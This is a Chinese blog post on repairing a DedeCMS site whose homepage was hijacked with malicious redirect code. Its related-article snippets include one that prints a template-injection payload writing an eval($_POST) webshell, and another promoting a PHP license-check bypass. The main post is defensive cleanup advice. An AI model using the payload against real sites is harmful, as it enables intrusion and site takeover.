dede网站首页被黑攻击植入恶意跳转代码怎么办? 首页经常被篡改标题关键字的解决方法

最新推荐文章于 2024-08-02 16:30:42 发布
原创 最新推荐文章于 2024-08-02 16:30:42 发布 · 4.3k 阅读 · 4 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

网站title被加入代码:

 

 

首先,我们要先修复首页代码,解决跳转问题,避免更多用户跳转到恶意页面,也是避免网站被篡改后的tdk被搜索引擎收录!
然后我们先解决对方通过自定义宏标记和智能标记向导来篡改首页代码的问题,我们可以删除后台目录(默认是dede文件夹)下的:

mytag_add.php、

mytag_edit.php、

mytag_main.php、

mytag_tag_guide.php、

mytag_tag_guide_ok.php五个php文件,这五个文件一般不会使用,所以可以放心删除(也可以先自己备份好)。如果删除后网站首页代码仍然被篡改,那么就需要检查其它文件夹中的内容,特别是模板文件夹和自己创建的栏目文件夹,如果在其中发现了php文件,就需要立刻删除(模板目录和栏目目录中正常是不会出现php文件的),

然后再查看根目录下的index.php文件是否被修改(如果用不到可以直接删除)。
在执行上述操作之后,如果网站首页代码被篡改的问题仍然没有解决,那么可以在ftp中将整站文件下载到本地,然后搜索是否存在有a.php、b.php这些单字母命名的php文件,然后使用织梦后台系统自带的病毒扫描功能进行扫描,查看是否有异常php文件。

最低0.47元/天 解锁文章

200万优质内容无限畅学
网站了怎么办?
努力是为了站在万人之中,成为别人的光
11-28 9378
网站现在越来越常见,不仅中国,全世界都一样。Google官方博客17年3月份的一篇帖子提到,被网站数目2016年比2015年增加了32%,而且没有减缓的趋势。扫描端口、撞密码、利用CMS漏洞注入之类的太多太多了。 为SEO而别人网站是其中一个原因,进别人网站后,可以创建页面,在现有页面加内容、加链接,做转向,做cloaking等等。当然,SEO只是比较小的原因,更多的客是为了干别的。 其实我是觉得,别人网站,不是SEO,连帽SEO也不是。虽然我不提倡做帽SEO,但对帽是充满敬意的。这里
织梦dedecms网站首页标题恶意非法篡改乱码解决办法!!
威小胖的博客
12-15 2273
dedecms篡改问题让很多人头疼,还有的网站中毒了会跳转到BC网站,赌博、彩票网站上去了,网站在百度搜索出现:百度网址安全中心提醒您:该站点可能受到攻击,部分页面已被非法篡… 近期,我的诸多客户的网站同时被攻击,症状都是网站首页标题TDK被非法篡改,在dede后台更新下首页可以恢复正常,没过多久又会自动非法篡改,而且还是加密乱码。 通过站长工具SEO检测工具,网站标题和关键词竟然...
dedecms织梦首页篡改 网站跳转解决办法建议
热门推荐
网站安全专家
09-10 1万+
对此我们已经处理过很多像这样问题的客户网站,这种安全问题普遍的特征就是:频繁反复性质的篡改网站首页,重新在网站后台首页生成后,被篡改的内容就会清除,但没过多久就又被篡改了,使很多网站的负责人很烦恼,公司网站频繁被篡改跳转dubo,caipiao网站的安全问题,给公司的利益带来了很大的损失,比如客户从百度搜索公司产品或百度推广的地址进入到公司网站会被直接跳转到duboi、caipiao网站上去,导致客户对该公司的信誉大大降低,产生不信任。加强对网站sql注入防护的措施过滤。
如何解决公司网站首页恶意跳转的安全问题
weixin_34126557的博客
07-26 715
近日某客户网站,导致网站首页篡改跳转到赌博网站网站在百度的收录也收录了一些什么彩票内容的快照,网站首页快照也被修改成赌博内容,并被百度直接红色风险拦截提示,百度网址安全中心提醒您:该站点可能受到攻击,部分页面已被非法篡改!我们SINE安全公司根据以上客户被的情况,立即进行了全面的网站安全检测,针对网站的情况制定了详细的安全部署方案。 ...
浏览器起始页被篡改恶意跳转解决方法
weixin_34248258的博客
07-29 2069
更新:2014-09-10 14:11 有时候遇到这种不修改注册表,不改浏览器设置的主页恶意篡改行为,不知道方法很难清除,下面我们自己动手,解决这种“最新流氓篡改主页”的问题: 一切未经主人同意的修改都是耍流氓!是不是特别反感这样的行为? 本 教程,真正解决IE、百度等浏览器被恶意跳转到“http://www.haodh.net/?****”、“http://...
网页突然被恶意跳转或无法打开?DNS污染怎么解决
wing_77的博客
07-27 2788
在网上冲浪时,我们时常会遭遇DNS污染这一区域性攻击,几乎无人能幸免。受影响时:尝试访问正规网站可能会被错误导向赌博、色情或其他恶意站点。
DEDE内容页调用栏目的SEO标题、描述、关键字方法
05-12
DEDE内容页调用栏目的SEO标题、描述、关键字方法主要涉及到的是网站优化(SEO)中的关键元素,这些元素对于提升网站在搜索引擎结果中的排名至关重要。DEDE,全称为DedeCMS,是一款广泛使用的开源内容管理系统,它...
dede动态首页代码
06-06
dede动态首页代码解析与应用》 在网站开发中,动态首页是一种常见的技术实践,它使得网站内容可以根据用户交互或者服务器端的数据实时更新。在本文中,我们将深入探讨"dede动态首页代码",了解其工作原理以及如何...
网站客非法添加跳转链接的解决方法
sjdhdbjd的博客
04-03 803
疑似为被客修改后的文件,使用git reset --hard 命令将退回文件未被客修改前的版本。在Web 控制面板上配置通过添加ip看能否正常访问网站,以此来判断自己的网站是否已经正常。如果通过ip地址可以成功访问到页面,还需在网页中右键查看源代码,观察那些被修改的文件。进入相对应的文件目录使用 git status 命令查看发生更改的文件。即可进入相关云服务提供商操作界面申请解除封禁。再次使用git status命令查看。发现工作区已恢复正常。
解决网站植入跳转木马病毒
@云安全小杜
08-02 2735
网站植入跳转木马病毒是一种常见的安全威胁,它可能导致网站用户被重定向到恶意站点。本文将指导您如何检测、清除这类木马病毒以及采取预防措施。
dedecms织梦挂马被首页频繁被篡改后门漏洞清理
gysea123321的博客
10-31 1571
dedecms织梦挂马被首页频繁被篡改后门漏洞清理?最近不少客户反映首页篡改,登录服务器查看没有被上传异常文件,但是首页生成后,有一段异常且被加密过的代码。更换内核后,还是依然出现,通过研究发现,首页模板被加入了【自定义宏标记】内容,标签为:{dede:mytag typeid='0' name=''/} ,内容为一段异常代码。异常代码如图: DEDECMS 5.7最新版本,包括之前的5...
网站攻击 点击链接跳转到别人网站
网站安全专家
12-20 611
临近2019年底,网站安全事件频发,攻击者加大了对网站攻击力度,一定是在为过年钱做准备,大捞一把过个好年。就在最近,某客户网站被入侵并被篡改首页代码网站从搜索引擎打开直接跳转到了彩//piao网站上去了,通过朋友介绍找到我们SINESAFE做网站安全服务,防止网站攻击,恢复网站的正常访问,关于此次安全事件的应急处理,以及如何做网站的安全加固,我们通过文章的形式记录一下。 2019年1...
window 2003主机所有网站页面都在头部被插入恶意代码,但代码中却找不到可能原因
我的笔记
04-11 811
运行cmd命令行窗口;输入 arp -d 清空arp缓存;输入 arp -a 显示缓存;发现网关被 指向一个未明ip地址(因为本机网关用的是外网ip);这就是来间代码来源原因,它在每个页面前面插入代码;使用 arp -s 你的网关ip 你的网关网卡MAC地址 来绑定;恶意代码消失; 我的网站被插入的恶意代码是:2233.org
对付恶意网站有绝招—教你三种解决办法
编程爱好者
03-01 3303
不少电脑用户在上网时都受到过恶意网站的骚扰,恶意网站会偷偷地对你的系统进行修改。  对于已知的恶意网站地址,我们可以在IE中把它“屏蔽”起来,具体的设置方法如下:打开IE浏览器,然后单击菜单“工具→Internet选项”,在打开的窗口中选择“安全”标签,再选择“受限制的站点”,单击“站点”按钮,在弹出的窗口中将所有的恶意网站地址添加进来,最后“确定”返回上层设置窗口,然后再单击“自定义级别”按钮将
php链接跳转页面错误,织梦DEDECMS首页错误跳转解决方法
weixin_42489589的博客
03-17 552
用织梦DEDECMS建站的朋友非常之多,我自己也是用织梦DEDECMS建立的网站,为什么要选择织梦DEDECMS呢,那是因为织梦DEDECMS有非常强大的功能,也有非常强大的研发团队,所以广大站长都选择了织梦DEDECMS来建立自己的网站。今天我和大家分享一个我在用织梦DEDECMS建立网站时碰到的一个问题:我在织梦官网下载好程序以后,在本机修改测试完成,把它打包上传至服务器,设置好数据库等等,并...
解决织梦后台"DEDECMS安全提示"
PHP错误汇总
01-03 328
织梦后台系统是目前被采用最多的网站CMS,很多SEOer都操作过织梦后台,那么细心的网络营销人员就会发现,在后台首页有一个版块叫“DEDECMS安全提示”,里面写了3条提示(如图1): 1、目前data、uploads有执行.php权限,非常危险,需要立即取消目录的执行权限! 2、强烈建议data/common.inc.php文件属性设置为644(Linux/Unix)或只读(NT)。 3、强烈建议将data目录搬移到Web根目录以外。 (此图片来源于网络,如有侵权,请联系删除! ) ...
DedeCms v5.6 嵌入恶意代码执行漏洞
Yatere的天平秤
04-25 1318
在上传软件的地方,对本地地址没有进行有效的验证,可以被恶意利用注册会员,上传软件:本地地址中填入a{/dede:link}{dede:toby57 name/="']=0;phpinfo();//"}x{/dede:toby57},发表后查看或修改即可执行a{/dede:link}{dede:toby57 name/="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz
很经典-网页恶意代码的现象及处理方法 [转载]
weixin_34383618的博客
08-18 484
这些都是自己或朋友平时遇到的问题,在解决处理过程中积累下来的,有些是翻书来的,有些是网上搜集来的,经过整理后和大家分享一下!~ (一).默认主页被修改   1.破坏特性:默认主页被自动改为某网站的网址。   2.表现形式:浏览器的默认主页被自动设为如www.********.com的网址。 3.清除方法:采用手动修改注册表法,开始菜单->运行->re...
披露轻松破解绕过PHP授权代码方法
winkexin的博客
06-26 3627
找的php源码有授权,是不是很烦?今天执刀人给大家介绍一篇简单通用的轻松破解绕过PHP授权代码方法,可以轻松破解大部分授权代码。第一步:首先你要找到源码中全局文件,改名全局文件,比如说全局文件 common.php,那么 你将他改为core.php。第二步:创建一个跟全局文件名称一样的文件,然后把以下代码复制进去就OK了。破解PHP授权代码步骤。
织梦CMS 手机访问域名 被 恶意跳转 解决方案 安全设置
最新发布
03-09
<think>好的,我现在需要解决用户提到的织梦CMS手机端域名被恶意跳转的问题。首先,我得了解织梦CMS的基本结构和常见的安全漏洞。根据用户提供的引用[3],织梦CMS(DedeCMS)确实存在很多漏洞,所以安全配置是关键。 首先,用户的问题是关于手机访问域名被恶意跳转,这可能是因为被注入了恶意代码或者配置文件被篡改。我需要考虑几个方面:检查代码是否有后门,更新CMS到最新版本,检查服务器配置,以及加强权限设置。 第一步,建议用户检查模板文件和核心代码是否有可疑的代码。比如在手机端的模板文件中,可能有被插入的JavaScript代码导致跳转。常见的文件可能包括/m/目录下的index.php或者其他模板文件。 第二步,更新系统补丁。织梦CMS过去有很多漏洞,如果用户使用的是旧版本,可能存在已知漏洞被利用的情况。确保所有补丁都已安装,尤其是安全更新。 第三步,检查服务器文件权限。确保关键目录如/data/、/uploads/等不可执行,避免攻击者上传恶意脚本。同时,检查.htaccess或nginx配置文件是否有异常的重定向规则。 第四步,数据库检查。恶意跳转可能是通过数据库注入的,比如在系统配置表中添加了恶意URL。需要检查数据库中的dede_config表,查看是否有异常的配置项。 第五步,加强安全防护。比如设置目录权限,禁用不必要的PHP函数,安装安全插件或WAF(Web应用防火墙)来防止注入攻击。 此外,用户提到的引用[2]中提到子域名可能防护较弱,但这里的问题是关于主站的手机端,所以可能不需要子域名信息,但也不能排除跨子域攻击的可能性,需要全面检查。 最后,备份网站和数据库是必须的,确保在操作前有可恢复的备份,避免操作失误导致数据丢失。</think>### 织梦CMS手机端域名恶意跳转解决方法 #### 1. **检查模板文件与核心代码** - **模板文件排查**: 检查手机端模板文件(通常位于`/m/`目录下的`index.php`或`/templets/`中的模板文件),查看是否被插入恶意跳转代码,例如: ```php header("Location: http://恶意域名"); ``` 或JavaScript跳转代码: ```javascript <script>window.location.href="http://恶意域名";</script> ``` - **核心文件检查**: 排查`/include/`、`/data/`等核心目录,确认是否存在可疑的PHP后门文件(如`eval($_POST[cmd])`等)[^3]。 #### 2. **更新织梦CMS补丁** - 从官网下载最新补丁(如DedeCMS V5.7 SP2),修复已知漏洞(如文件上传、SQL注入等)。历史漏洞可能导致攻击植入恶意代码[^3]。 #### 3. **服务器与目录权限加固** - **目录权限设置**: 限制关键目录的写入权限: ```bash chmod -R 755 /网站根目录/ chmod -R 644 /网站根目录/data/ ``` - **禁用危险函数**: 修改`php.ini`,禁用`system`、`exec`、`passthru`等函数: ```ini disable_functions = system,exec,passthru,shell_exec ``` #### 4. **数据库安全检查** - **系统配置表检查**: 登录数据库,检查`dede_config`表中`cfg_webname`、`cfg_cmspath`等字段是否被篡改: ```sql SELECT * FROM dede_config WHERE vars_name IN ('cfg_webname', 'cfg_cmspath'); ``` - **清理异常数据**: 检查`dede_member`、`dede_arctiny`等表是否存在异常管理员账号或文章。 #### 5. **防止重定向漏洞** - **过滤输入参数**: 在涉及URL跳转代码(如`/plus/ajax.php`)中,对`$_GET['url']`等参数进行白名单校验: ```php $allowed_domains = ['example.com', 'm.example.com']; if (!in_array(parse_url($_GET['url'], PHP_URL_HOST), $allowed_domains)) { exit('非法请求'); } ``` #### 6. **部署Web应用防火墙(WAF)** - 使用云WAF(如阿里云盾、腾讯云网站管家)或开源工具(如ModSecurity),拦截恶意请求与SQL注入攻击[^1]。 #### 7. **定期备份与监控** - 使用工具(如Rsync)定期备份网站文件和数据库,并监控`/data/backup/`目录,防止备份文件被下载导致数据泄露。 --- ###
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值